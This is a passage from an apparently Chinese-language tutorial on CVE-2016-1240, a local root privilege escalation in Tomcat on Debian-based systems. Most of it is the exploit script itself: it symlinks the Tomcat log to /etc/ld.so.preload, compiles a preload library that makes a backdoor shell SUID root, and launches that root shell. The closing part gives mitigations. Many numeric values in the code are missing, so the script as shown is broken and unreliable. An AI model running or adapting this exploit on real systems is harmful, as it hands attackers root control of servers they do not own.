    echo -e "\n[+] Cleaning up..."

    rm -f $PRIVESCSRC

    rm -f $PRIVESCLIB

    rm -f $TOMCATLOG

    touch $TOMCATLOG

    if [ -f /etc/ld.so.preload ]; then

        echo -n > /etc/ld.so.preload >/dev/null

    fi

    echo -e "\n[+] Job done. Exiting with code $1 \n"

    exit $

}

function ctrl_c() {

        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."

    cleanexit

}

#intro

echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"

echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args

if [ $# -lt  ]; then

    echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"

    exit

fi

if [ "$2" = "-deferred" ]; then

    mode="deferred"

else

    mode="active"

fi

# Priv check

echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"

id | grep -q tomcat

if [ $? -ne  ]; then

    echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"

    exit

fi

# Set target paths

TOMCATLOG="$1"

if [ ! -f $TOMCATLOG ]; then

    echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"

    exit

fi

echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default

# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around :25am.

# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been

# restarted and file owner gets changed.

if [ "$mode" = "deferred" ]; then

    rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG

    if [ $? -ne  ]; then

        echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."

        cleanexit

    fi

    echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

    echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"

    echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"

    echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"

    echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)

 \n\n"

    exit

fi

# [ Active exploitation ]

trap ctrl_c INT

# Compile privesc preload library

echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"

cat <<_solibeof_>$PRIVESCSRC

#define _GNU_SOURCE

#include <stdio.h>

#include <sys/stat.h>

#include <unistd.h>

#include <dlfcn.h>

uid_t geteuid(void) {

    static uid_t  (*old_geteuid)();

    old_geteuid = dlsym(RTLD_NEXT, "geteuid");

    if ( old_geteuid() ==  ) {

        chown("$BACKDOORPATH", , );

        chmod("$BACKDOORPATH", );

        unlink("/etc/ld.so.preload");

    }

    return old_geteuid();

}

_solibeof_

gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl

if [ $? -ne  ]; then

    echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."

    cleanexit ;

fi

# Prepare backdoor shell

cp $BACKDOORSH $BACKDOORPATH

echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check

if [ -f /etc/ld.so.preload ]; then

    echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."

    cleanexit

fi

# Symlink the log file to ld.so.preload

rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG

if [ $? -ne  ]; then

    echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."

    cleanexit

fi

echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs

echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."

echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)

 "

while :; do

    sleep 0.1

    if [ -f /etc/ld.so.preload ]; then

        echo $PRIVESCLIB > /etc/ld.so.preload

        break;

    fi

done

# /etc/ld.so.preload file should be owned by tomcat user at this point

# Inject the privesc.so shared library to escalate privileges

echo $PRIVESCLIB > /etc/ld.so.preload

echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"

echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"

echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)

echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"

sudo --help >/dev/null >/dev/null

# Check for the rootshell

ls -l $BACKDOORPATH | grep rws | grep -q root

if [ $? -eq  ]; then

    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"

    echo -e "\n\033[94mPlease tell me you're seeing this too ;)

  \[0m"

else

    echo -e "\n[!] Failed to get root"

    cleanexit

fi

# Execute the rootshell

echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"

$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"

$BACKDOORPATH -p

# Job done.

cleanexit 

5. 修复方案

0x1: 临时修复方案: chown -h

可更改Tomcat的启动脚本为

chown -h $TOMCAT6_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

root@iZ23und3yqhZ:~# chown --h

Usage: chown [OPTION]... [OWNER][:[GROUP]] FILE...

  or:  chown [OPTION]... --reference=RFILE FILE...

Change the owner and/or group of each FILE to OWNER and/or GROUP.

With --reference, change the owner and group of each FILE to those of RFILE.

  -c, --changes          like verbose but report only when a change is made

  -f, --silent, --quiet  suppress most error messages

  -v, --verbose          output a diagnostic for every file processed

      --dereference      affect the referent of each symbolic link (this is

                         the default), rather than the symbolic link itself

  -h, --no-dereference   affect symbolic links instead of any referenced file

                         (useful only on systems that can change the

                         ownership of a symlink)

      --from=CURRENT_OWNER:CURRENT_GROUP

                         change the owner and/or group of each file only if

                         its current owner and/or group match those specified

                         here.  Either may be omitted, in which case a match

                         is not required for the omitted attribute

      --no-preserve-root  do not treat '/' specially (the default)

      --preserve-root    fail to operate recursively on '/'

      --reference=RFILE  use RFILE's owner and group rather than

                         specifying OWNER:GROUP values

  -R, --recursive        operate on files and directories recursively

The following options modify how a hierarchy is traversed when the -R

option is also specified.  If more than one is specified, only the final

one takes effect.

  -H                     if a command line argument is a symbolic link

                         to a directory, traverse it

  -L                     traverse every symbolic link to a directory

                         encountered

  -P                     do not traverse any symbolic links (default)

      --help     display this help and exit

      --version  output version information and exit

加入 -h 参数防止其他文件所有者被更改(禁止了解析软链接)

0x2: 临时修复方案: chown改为install

# Run the catalina.sh script as a daemon

set +e

if [ ! -f "$CATALINA_BASE"/logs/catalina.out ]; then

    install -o $TOMCAT7_USER -g adm -m  /dev/null "$CATALINA_BASE"/logs/catalina.out

fi

install -o $TOMCAT7_USER -g adm -m  /dev/null "$CATALINA_PID"

start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" -c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" -x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"

status="$?"

set +a -e

return $status

0x3: 更新最新Tomcat包

Debian安全小组已经在第一时间修复了受影响的Tomcat上游包,直接更新发行版提供的Tomcat即可(apt-get源已更新)

Copyright (c) 2016 LittleHann All rights reserved

CVE-2016-1240 Tomcat 服务本地提权漏洞的相关教程结束。